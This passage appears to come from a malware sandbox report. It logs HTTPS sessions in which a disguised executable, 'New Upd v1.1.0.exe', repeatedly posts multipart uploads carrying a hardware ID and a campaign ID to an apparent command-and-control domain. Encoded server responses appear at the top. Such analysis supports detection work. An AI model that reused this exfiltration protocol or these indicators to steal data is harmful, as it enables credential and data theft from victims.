                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hiVkn73MaVpRxEprMJ25JO1i2M%2B44zuJeRp7%2BoKZ5HqCrlLTaf5GoqusFXneQwF9rJE2iMvT1Iu%2FuJrq%2BsEVLXTqnDsF81T9XfCFfaAqZx1%2FKvwy%2FRpfAPkJGetmWinFBU8%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f8cb3da59d54386-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1868&min_rtt=1858&rtt_var=717&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=985&delivery_rate=1504379&cwnd=246&unsent_bytes=0&cid=5a07b72d74bde815&ts=786&x=0"
                                                                              2024-12-27 22:21:15 UTC240INData Raw: 32 64 38 39 0d 0a 70 68 55 59 73 44 2f 57 64 4b 71 56 70 47 68 4f 48 71 64 34 73 65 77 4c 33 36 38 55 30 48 66 42 53 4e 7a 2f 66 34 36 57 6c 46 4c 64 4e 32 36 53 42 65 4a 59 69 4f 62 42 53 6e 52 34 78 68 54 43 69 53 66 39 7a 6e 44 79 54 61 63 70 73 49 77 61 6f 72 54 69 50 34 51 76 66 74 46 54 70 52 47 47 74 38 45 51 62 43 54 38 41 35 4f 4a 5a 66 32 56 4e 72 55 64 6f 79 6d 77 6e 52 37 6c 2b 65 51 2b 78 58 31 30 31 31 65 7a 46 38 37 30 79 41 55 72 65 38 49 5a 32 34 4a 69 73 73 64 35 38 6c 76 6a 4c 61 62 64 52 61 7a 62 38 53 62 48 57 48 6e 44 56 50 51 4a 68 75 36 47 44 53 41 38 6e 56 72 51 69 57 6d 7a 79 58 43 37 48 36 6b 67 75 4a 77 62 35 4f 62 39 4e 4d 35 39 65 74 52 57 75 52 37 61 2b 63 49 43 49 48 33 49 47 5a
                                                                              Data Ascii: 2d89phUYsD/WdKqVpGhOHqd4sewL368U0HfBSNz/f46WlFLdN26SBeJYiObBSnR4xhTCiSf9znDyTacpsIwaorTiP4QvftFTpRGGt8EQbCT8A5OJZf2VNrUdoymwnR7l+eQ+xX1011ezF870yAUre8IZ24Jissd58lvjLabdRazb8SbHWHnDVPQJhu6GDSA8nVrQiWmzyXC7H6kguJwb5Ob9NM59etRWuR7a+cICIH3IGZ
                                                                              2024-12-27 22:21:15 UTC1369INData Raw: 50 41 4b 62 72 56 4e 75 70 56 38 42 69 39 6a 41 7a 35 2b 65 59 32 68 47 67 30 79 78 32 7a 47 6f 69 76 68 67 49 67 63 73 41 5a 33 49 6c 6f 76 64 39 35 73 68 61 72 49 72 71 58 45 75 50 37 2b 44 72 44 66 33 50 56 55 72 4d 65 7a 76 6a 46 53 6d 49 38 77 67 4b 54 31 69 6d 64 33 58 57 78 41 61 34 37 2f 6f 4a 54 39 62 54 78 50 49 51 76 4f 74 52 54 74 52 76 49 35 63 34 42 4a 33 6e 58 45 64 71 44 5a 4c 33 41 66 4c 30 57 6f 79 32 30 6c 78 4c 6d 38 50 73 39 77 6e 64 36 6b 68 50 30 45 64 43 33 6e 6b 6f 50 65 64 55 64 33 35 67 72 68 34 31 70 2f 41 7a 6a 4c 62 4c 64 52 61 7a 38 38 7a 50 48 66 48 58 52 56 62 38 45 79 4f 58 41 42 79 6c 75 77 78 2f 64 68 47 71 76 78 33 69 30 46 71 6f 68 74 35 67 61 36 4c 53 34 63 4d 4e 76 4f 6f 6f 64 6c 52 76 44 2b 38 77 64 4c 44 7a 61 56
                                                                              Data Ascii: PAKbrVNupV8Bi9jAz5+eY2hGg0yx2zGoivhgIgcsAZ3Ilovd95sharIrqXEuP7+DrDf3PVUrMezvjFSmI8wgKT1imd3XWxAa47/oJT9bTxPIQvOtRTtRvI5c4BJ3nXEdqDZL3AfL0Woy20lxLm8Ps9wnd6khP0EdC3nkoPedUd35grh41p/AzjLbLdRaz88zPHfHXRVb8EyOXAByluwx/dhGqvx3i0Fqoht5ga6LS4cMNvOoodlRvD+8wdLDzaV
                                                                              2024-12-27 22:21:15 UTC1369INData Raw: 33 7a 58 36 33 46 4b 6b 67 2f 74 4e 64 36 2b 79 32 61 49 52 47 62 64 6b 66 67 52 58 47 2b 63 45 63 62 47 4f 4c 41 35 4f 4a 5a 66 32 56 4e 72 38 64 70 69 2b 78 6e 42 66 69 38 66 77 38 7a 48 6c 35 77 46 4b 77 46 73 54 2f 7a 41 63 69 65 4d 30 54 32 49 56 76 76 63 78 38 38 6c 76 6a 4c 61 62 64 52 61 7a 41 38 54 7a 4a 65 44 6a 6e 58 72 6f 59 7a 2b 47 47 46 57 4a 6c 68 52 33 66 7a 6a 48 39 77 58 2b 79 48 71 6b 75 76 70 6f 51 36 66 66 78 4d 38 6c 77 63 4e 78 61 73 42 72 42 2b 73 41 4b 4b 33 6a 41 43 4e 61 48 5a 62 47 4e 4f 50 49 53 75 32 72 6d 33 54 4c 72 34 76 55 66 78 32 5a 7a 6b 6b 4c 36 44 34 6a 77 79 6b 70 30 50 4d 49 66 32 34 56 76 74 63 31 6b 74 78 75 6f 4b 37 53 62 48 4f 48 34 38 44 44 46 64 33 7a 65 58 62 4d 52 32 75 58 44 44 44 35 32 68 56 53 54 69 58
                                                                              Data Ascii: 3zX63FKkg/tNd6+y2aIRGbdkfgRXG+cEcbGOLA5OJZf2VNr8dpi+xnBfi8fw8zHl5wFKwFsT/zAcieM0T2IVvvcx88lvjLabdRazA8TzJeDjnXroYz+GGFWJlhR3fzjH9wX+yHqkuvpoQ6ffxM8lwcNxasBrB+sAKK3jACNaHZbGNOPISu2rm3TLr4vUfx2ZzkkL6D4jwykp0PMIf24Vvtc1ktxuoK7SbHOH48DDFd3zeXbMR2uXDDD52hVSTiX
                                                                              2024-12-27 22:21:15 UTC1369INData Raw: 74 52 6e 6a 63 76 36 65 45 75 58 37 2f 6a 6a 4c 65 48 37 63 57 37 49 62 7a 66 6a 4d 47 43 52 79 79 42 48 63 68 58 75 39 77 48 4b 2b 45 61 73 68 74 4e 31 54 72 50 50 75 63 4a 77 33 54 39 39 53 74 42 58 65 74 39 6c 45 4e 54 7a 43 46 70 50 57 4b 62 48 44 64 72 30 5a 72 79 47 32 6e 42 48 69 38 2f 4d 35 7a 48 39 6f 30 31 6d 38 46 38 62 34 78 77 34 70 65 63 45 64 31 34 68 6d 2f 59 4d 32 74 51 33 6a 63 76 36 79 4f 74 6d 32 31 77 71 45 61 44 54 4c 48 62 4d 61 69 4b 2b 47 42 69 39 77 7a 52 58 56 68 32 57 33 78 48 32 2b 48 71 63 6d 74 35 67 62 37 66 48 7a 4d 63 42 37 63 4e 52 65 74 78 6e 48 2b 4d 35 4b 59 6a 7a 43 41 70 50 57 4b 5a 6a 61 66 62 77 54 34 7a 58 77 68 46 33 72 2b 4c 5a 6f 68 48 74 7a 31 46 75 78 47 73 6e 78 7a 67 38 6b 65 4d 51 63 31 59 31 6d 75 63 68
                                                                              Data Ascii: tRnjcv6eEuX7/jjLeH7cW7IbzfjMGCRyyBHchXu9wHK+EashtN1TrPPucJw3T99StBXet9lENTzCFpPWKbHDdr0ZryG2nBHi8/M5zH9o01m8F8b4xw4pecEd14hm/YM2tQ3jcv6yOtm21wqEaDTLHbMaiK+GBi9wzRXVh2W3xH2+Hqcmt5gb7fHzMcB7cNRetxnH+M5KYjzCApPWKZjafbwT4zXwhF3r+LZohHtz1FuxGsnxzg8keMQc1Y1much
                                                                              2024-12-27 22:21:15 UTC1369INData Raw: 43 53 78 6e 67 2f 74 2b 66 30 69 77 33 68 2b 31 56 47 79 47 63 37 32 77 77 41 67 65 38 41 52 33 49 49 70 38 34 31 78 71 6c 58 37 61 70 43 57 44 76 76 33 2b 44 76 53 62 44 72 4e 45 36 31 57 7a 2f 75 47 55 6d 78 2f 7a 68 48 58 6a 6d 57 39 79 58 75 79 42 36 77 74 75 5a 51 57 2f 76 37 78 4e 38 39 2f 63 64 31 62 70 68 72 47 35 63 4d 59 50 6a 79 4c 57 74 53 57 4b 65 57 4e 51 4c 55 46 73 79 6e 38 72 41 76 76 34 76 30 39 79 44 64 6c 6e 45 54 30 45 63 53 33 6e 6b 6f 71 63 38 77 5a 33 49 39 67 73 63 42 7a 75 78 43 69 4c 4c 71 58 46 2b 7a 79 38 44 48 42 66 58 6e 54 56 37 30 52 77 50 44 46 47 47 77 79 68 52 33 4c 7a 6a 48 39 35 48 47 67 47 37 4e 71 6f 64 4d 45 72 50 50 36 63 4a 77 33 66 74 68 53 73 42 48 45 38 63 4d 4d 49 58 33 4b 47 39 4f 42 62 62 62 45 63 4c 4d 59
                                                                              Data Ascii: CSxng/t+f0iw3h+1VGyGc72wwAge8AR3IIp841xqlX7apCWDvv3+DvSbDrNE61Wz/uGUmx/zhHXjmW9yXuyB6wtuZQW/v7xN89/cd1bphrG5cMYPjyLWtSWKeWNQLUFsyn8rAvv4v09yDdlnET0EcS3nkoqc8wZ3I9gscBzuxCiLLqXF+zy8DHBfXnTV70RwPDFGGwyhR3LzjH95HGgG7NqodMErPP6cJw3fthSsBHE8cMMIX3KG9OBbbbEcLMY
                                                                              2024-12-27 22:21:15 UTC1369INData Raw: 52 64 36 2f 69 32 61 49 52 33 63 4e 64 58 75 52 58 48 39 4e 51 4c 4b 6d 37 46 46 39 6d 63 59 37 62 49 65 37 38 59 6f 43 79 34 6c 68 48 2b 2f 66 59 7a 7a 7a 63 30 6b 6c 71 73 56 70 43 33 35 52 30 36 64 73 49 57 78 59 56 6f 76 74 74 37 6f 6c 58 74 61 71 2b 61 44 4b 79 73 34 43 44 54 63 47 57 63 52 50 51 52 78 4c 65 65 53 69 70 31 77 78 33 56 67 48 75 34 79 33 6d 39 48 4b 6f 75 74 70 34 64 36 50 44 78 4e 63 64 37 63 64 56 65 75 78 4c 42 2b 63 38 46 62 44 4b 46 48 63 76 4f 4d 66 33 73 62 62 45 5a 72 6d 71 68 30 77 53 73 38 2f 70 77 6e 44 64 32 33 46 69 30 48 4d 37 7a 77 77 77 6d 65 63 55 52 30 49 46 74 75 38 6c 35 73 68 36 71 4b 37 69 59 46 2b 66 79 2b 7a 50 43 63 54 71 63 48 62 4d 4f 69 4b 2b 47 4b 6a 64 78 79 52 32 54 6b 53 65 6b 6a 58 47 2b 56 66 74 71 74
                                                                              Data Ascii: Rd6/i2aIR3cNdXuRXH9NQLKm7FF9mcY7bIe78YoCy4lhH+/fYzzzc0klqsVpC35R06dsIWxYVovtt7olXtaq+aDKys4CDTcGWcRPQRxLeeSip1wx3VgHu4y3m9HKoutp4d6PDxNcd7cdVeuxLB+c8FbDKFHcvOMf3sbbEZrmqh0wSs8/pwnDd23Fi0HM7zwwwmecUR0IFtu8l5sh6qK7iYF+fy+zPCcTqcHbMOiK+GKjdxyR2TkSekjXG+Vftqt
                                                                              2024-12-27 22:21:15 UTC1369INData Raw: 37 74 6d 6a 39 4e 33 50 56 52 71 55 41 78 65 66 42 53 68 4d 79 68 51 4b 54 31 69 6d 49 7a 6e 69 38 45 72 55 37 38 37 6f 4c 35 76 50 6d 4e 39 4e 34 4f 70 77 64 73 6c 61 51 70 49 68 4b 4b 47 32 46 51 6f 50 63 4d 75 69 65 49 65 4a 48 76 47 53 6e 33 51 75 73 72 4b 52 2b 68 47 55 36 69 68 33 7a 46 64 72 6c 77 41 6b 36 66 34 49 6b 37 61 6c 7a 73 4d 74 68 6f 79 75 64 4c 61 53 51 47 2f 76 6c 75 69 58 48 65 58 54 56 53 2f 52 59 69 50 69 47 55 68 55 38 6a 56 72 73 77 43 6d 6c 6a 53 37 79 49 4b 41 6b 73 4a 6f 4c 2f 62 6e 52 4b 73 6c 78 62 63 4d 64 2b 6c 62 4f 74 35 35 61 59 6a 7a 42 43 35 50 57 4f 65 2b 57 49 2b 46 43 38 33 69 68 30 77 53 73 34 72 5a 6f 6c 6a 6b 36 77 42 33 73 56 6f 2f 30 31 42 67 71 66 39 4d 5a 6c 4c 42 58 6b 38 70 77 74 78 4b 7a 61 4a 43 57 43 65
                                                                              Data Ascii: 7tmj9N3PVRqUAxefBShMyhQKT1imIzni8ErU787oL5vPmN9N4OpwdslaQpIhKKG2FQoPcMuieIeJHvGSn3QusrKR+hGU6ih3zFdrlwAk6f4Ik7alzsMthoyudLaSQG/vluiXHeXTVS/RYiPiGUhU8jVrswCmljS7yIKAksJoL/bnRKslxbcMd+lbOt55aYjzBC5PWOe+WI+FC83ih0wSs4rZoljk6wB3sVo/01Bgqf9MZlLBXk8pwtxKzaJCWCe
                                                                              2024-12-27 22:21:15 UTC1369INData Raw: 78 57 46 71 78 56 4c 30 57 49 6a 78 68 6c 4a 2b 4d 6f 55 65 77 73 34 78 37 5a 38 74 35 30 62 30 65 75 79 43 55 2f 57 30 34 48 43 63 4a 54 53 53 54 2f 52 4f 69 4c 44 46 47 44 35 36 78 67 7a 51 79 56 65 44 36 6e 69 31 46 4c 55 36 71 5a 4a 53 77 73 4c 58 44 76 70 69 65 64 78 54 73 77 44 5a 74 34 68 4b 49 7a 79 64 49 35 50 47 4b 59 4b 44 4e 71 70 56 2b 32 71 4c 6e 68 50 69 38 2b 41 68 69 56 42 30 31 56 79 69 42 74 2f 34 69 53 51 61 58 59 56 55 6b 34 67 70 35 5a 38 34 38 68 47 79 61 75 62 4e 54 37 65 68 70 57 65 55 4a 57 57 63 52 50 51 41 69 4b 2b 55 52 47 78 75 68 55 4b 54 79 57 71 76 33 33 43 78 41 36 42 74 67 4b 4d 36 34 76 50 33 4a 74 52 36 64 76 4e 65 70 52 7a 32 79 64 4d 4a 49 6e 4c 43 44 4d 4c 4f 4a 2f 33 43 4e 75 6f 73 34 32 4c 2b 6f 6c 4f 73 37 4c 5a
                                                                              Data Ascii: xWFqxVL0WIjxhlJ+MoUews4x7Z8t50b0euyCU/W04HCcJTSST/ROiLDFGD56xgzQyVeD6ni1FLU6qZJSwsLXDvpiedxTswDZt4hKIzydI5PGKYKDNqpV+2qLnhPi8+AhiVB01VyiBt/4iSQaXYVUk4gp5Z848hGyaubNT7ehpWeUJWWcRPQAiK+URGxuhUKTyWqv33CxA6BtgKM64vP3JtR6dvNepRz2ydMJInLCDMLOJ/3CNuos42L+olOs7LZ
                                                                              2024-12-27 22:21:15 UTC1369INData Raw: 5a 42 73 75 52 4c 65 34 73 55 61 4b 30 4c 37 4e 38 47 4a 65 62 36 50 57 72 55 59 72 78 53 41 71 67 7a 72 35 4c 51 57 78 32 46 35 6b 68 50 30 44 6f 69 76 68 69 63 2b 65 39 55 5a 6b 61 4a 75 73 4d 45 32 72 56 75 36 61 71 6a 64 52 62 2b 36 74 69 4b 45 4c 7a 71 56 58 71 59 45 7a 76 54 51 43 57 74 43 2b 7a 66 42 69 58 6d 2b 6a 30 65 2f 45 62 55 2f 76 59 30 61 30 73 72 62 49 73 4e 6e 65 5a 42 34 6a 6c 54 35 34 63 55 4b 49 6e 75 46 56 4a 4f 57 4b 65 57 4e 57 36 41 53 73 79 6e 38 75 43 65 75 78 65 41 7a 78 48 6c 39 6b 68 50 30 47 6f 69 76 68 67 63 2b 65 39 55 5a 6e 34 6c 7a 75 6f 31 70 2f 41 7a 6a 50 50 37 46 54 71 4b 30 35 48 43 63 4e 7a 33 63 55 4c 55 56 78 76 54 55 47 43 70 2f 30 78 6d 55 73 46 65 53 78 6e 65 69 47 4c 49 6e 75 6f 73 6a 30 74 50 77 4e 63 4e 4a
                                                                              Data Ascii: ZBsuRLe4sUaK0L7N8GJeb6PWrUYrxSAqgzr5LQWx2F5khP0Doivhic+e9UZkaJusME2rVu6aqjdRb+6tiKELzqVXqYEzvTQCWtC+zfBiXm+j0e/EbU/vY0a0srbIsNneZB4jlT54cUKInuFVJOWKeWNW6ASsyn8uCeuxeAzxHl9khP0Goivhgc+e9UZn4lzuo1p/AzjPP7FTqK05HCcNz3cULUVxvTUGCp/0xmUsFeSxneiGLInuosj0tPwNcNJ


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449739104.21.92.914437576C:\Users\user\Desktop\New Upd v1.1.0.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 22:21:17 UTC280OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=HCC3PJ4LT1SPICR26
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 18164
                                                                              Host: begguinnerz.biz
                                                                              2024-12-27 22:21:17 UTC15331OUTData Raw: 2d 2d 48 43 43 33 50 4a 34 4c 54 31 53 50 49 43 52 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 46 34 46 30 30 37 36 31 42 33 31 30 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 48 43 43 33 50 4a 34 4c 54 31 53 50 49 43 52 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 43 43 33 50 4a 34 4c 54 31 53 50 49 43 52 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39
                                                                              Data Ascii: --HCC3PJ4LT1SPICR26Content-Disposition: form-data; name="hwid"A4F4F00761B3102BBEBA0C6A975F1733--HCC3PJ4LT1SPICR26Content-Disposition: form-data; name="pid"2--HCC3PJ4LT1SPICR26Content-Disposition: form-data; name="lid"HpOoIh--3fe7f419
                                                                              2024-12-27 22:21:17 UTC2833OUTData Raw: cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b
                                                                              Data Ascii: xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
                                                                              2024-12-27 22:21:18 UTC1136INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 22:21:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=4b32pa7mqe97vg18h66ad90sve; expires=Tue, 22 Apr 2025 16:07:56 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AzFAYC5%2BDHvI5mwPIP25kNKJUSRds%2FkUPFfMjLR3ZdgkkfdHBBxjh9yDyLRLgkdH5rxE%2B1q3fvVQq9rOBuNmQfAdYOqyvh68%2FcmGz43jvOzM%2BpbE%2BX30CMxeLH4pJ%2FIHFO0%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f8cb3e88cb0431b-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3100&min_rtt=1771&rtt_var=1613&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19124&delivery_rate=1648785&cwnd=178&unsent_bytes=0&cid=9cf982edfa36595a&ts=966&x=0"
                                                                              2024-12-27 22:21:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-27 22:21:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449741104.21.92.914437576C:\Users\user\Desktop\New Upd v1.1.0.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 22:21:19 UTC281OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=PK480VEB774OH2B8VBQ
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8797
                                                                              Host: begguinnerz.biz
                                                                              2024-12-27 22:21:19 UTC8797OUTData Raw: 2d 2d 50 4b 34 38 30 56 45 42 37 37 34 4f 48 32 42 38 56 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 46 34 46 30 30 37 36 31 42 33 31 30 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 50 4b 34 38 30 56 45 42 37 37 34 4f 48 32 42 38 56 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4b 34 38 30 56 45 42 37 37 34 4f 48 32 42 38 56 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66
                                                                              Data Ascii: --PK480VEB774OH2B8VBQContent-Disposition: form-data; name="hwid"A4F4F00761B3102BBEBA0C6A975F1733--PK480VEB774OH2B8VBQContent-Disposition: form-data; name="pid"2--PK480VEB774OH2B8VBQContent-Disposition: form-data; name="lid"HpOoIh--3f
                                                                              2024-12-27 22:21:20 UTC1127INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 22:21:20 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=kjc3pk7lgq7cq9r3d1s8pogk9k; expires=Tue, 22 Apr 2025 16:07:59 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c5zMS6AYyaCdZBoe%2BdUS0rkRX9sB%2Bl8XsoAtwJDTgfR1h835enxrzCjuVlQEkRmmePImS4xsrfDteQAR1FhU0LvCkaKybFaMjeKYgDWSrh20TAUrvOrSfVf%2FVoUL%2BB6zw64%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f8cb3f6f8151902-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1495&rtt_var=579&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9736&delivery_rate=1861057&cwnd=219&unsent_bytes=0&cid=55ab99ce5a692fb2&ts=796&x=0"
                                                                              2024-12-27 22:21:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-27 22:21:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449742104.21.92.914437576C:\Users\user\Desktop\New Upd v1.1.0.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 22:21:21 UTC276OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=17SJPFTN8QWCK
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 20414
                                                                              Host: begguinnerz.biz
                                                                              2024-12-27 22:21:21 UTC15331OUTData Raw: 2d 2d 31 37 53 4a 50 46 54 4e 38 51 57 43 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 46 34 46 30 30 37 36 31 42 33 31 30 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 31 37 53 4a 50 46 54 4e 38 51 57 43 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 37 53 4a 50 46 54 4e 38 51 57 43 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 31 37 53 4a
                                                                              Data Ascii: --17SJPFTN8QWCKContent-Disposition: form-data; name="hwid"A4F4F00761B3102BBEBA0C6A975F1733--17SJPFTN8QWCKContent-Disposition: form-data; name="pid"3--17SJPFTN8QWCKContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--17SJ
                                                                              2024-12-27 22:21:21 UTC5083OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: lrQMn 64F6(X&7~`aO
                                                                              2024-12-27 22:21:22 UTC1128INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 22:21:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=imp6lm2ch0b2t4mde1og07l386; expires=Tue, 22 Apr 2025 16:08:01 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
